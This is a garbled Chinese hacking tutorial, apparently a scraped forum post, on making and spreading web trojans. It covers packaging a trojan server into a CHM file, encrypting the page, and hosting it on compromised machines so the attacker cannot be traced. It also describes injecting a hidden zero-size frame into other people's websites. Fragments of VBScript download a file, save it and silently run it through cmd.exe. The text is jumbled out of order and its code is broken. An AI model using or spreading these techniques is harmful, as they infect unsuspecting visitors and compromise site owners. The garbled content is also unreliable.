把以上代码插到对方网页代码中,那么下次别人浏览了那个站点就会自动转向_blank>http://127.0.0.1/m.htm。而_blank>http://127.0.0.1/m.htm也就是我门的网页木马了,那width="0" height="0"又是什么意思呢?懂点英文的朋友也应该知道了把,width就是宽而height自然就是高了。我们把它设置为0也就是不显示了,对方也就看不见我们的这个页面,木马也就会被下载到本地。
【学网教程】
<!-- 文章画中画块幅 -->
以前写了一篇文章,讲了关于怎样用最简单的方法获取对方的管理权限,里面用到了网页木马,最近有许多网友问我怎样制作网页木马,就这个问题我发表篇比较简单易懂的文章,希望大家珍惜我的劳动成果。
我们经常听到这样的忠告:“不要随意下在不明的程序,不要随意打开邮件的附件...”这样的忠告确实是有用的,不过我们的系统有不少漏洞,许多木马已经不需要客户端和服务端了,他们利用这些系统漏洞按照被系统认为合法的代码执行木马的功能,有的木马会在你完全不知道的情况下潜入,现在我来讲解下通过IE6的漏洞实现访问网页后神不知鬼不觉的下在并执行指定程序的例子,也就是网页木马.
网页加密程序,选择源文件为mm.htm目标文件m.htm然后点加密,程序就会在mm.htm目录下生成一个用javascript加密后的m.htm,然后把m.htm传肉鸡或空间里去把。 我在本机测试。_blank>http://127.0.0.1/m.htm就是我们的网页木马地址了,只要把这个发给别人,对方浏览了就会中了我们的木马。 但是对方会相信你吗?现在的网民安全意识也稍微提高了点,对于你发来的站都不会轻易去点。 所以呢~~还是自己动手把。入侵~~~~挂马!嘿嘿~~对不起那些站长了。 相信大家也都知道这个名词把.....不知道的就....别找我哦。
网页木马制作与传播
2009-08-19 22:30最简单的也就是用ChmBuilder这个软件来制作chm木马了,首先我们要配置好一个木马服务端,我再这里就拿QQ杀手7.1版说下把。关于他的使用和配置我就不多说了把,下载了这软件都自带有帮助文件的,看几遍就会明白的了。然后生成服务端,假设我生成的木马服务端为mm.exe,接着打开ChmBuilder选择我们的mm
<script language="vbscript">
Function HttpDoGet(url)
set oReq = CreateObject("Microsoft.XMLHTTP")
oReq.open "GET",url,false
oReq.send
If oReq.status=200 then
End Function
sub SaveFile(str.fName)
Set objStream = CreateObject("ADODB.Stream")
objStream.Type =1
objStream.Open
objStream.write str
objStream.SaveToFile fName.2
.exe然后点生成,就会在相同目录下自动生成一个mm.chm和mm.htm (注意:这几个文件可不要轻易去点哦,万一出了什么后果,不要找偶~~~……^_^) 接着就把mm.chm和mm.htm传到自己的空间,如果没空间有肉鸡也是可以滴,建议最好用肉鸡,这样万一对方发现了也是你发现你肉鸡。但是有的空间还是比较严格的,在上传时会发现那个mm.htm并不存在,那就是被对方的杀毒软件查杀了把。 到了这里我们就需要另外一个软件了htmtool
objStream.Close()
set objStream = nothing
exewin()
End sub
Sub exewin()
set wshshell=createobject ("wscript.shell" )
a=wshshell.run ("cmd.exe /c c:\win.exe",0)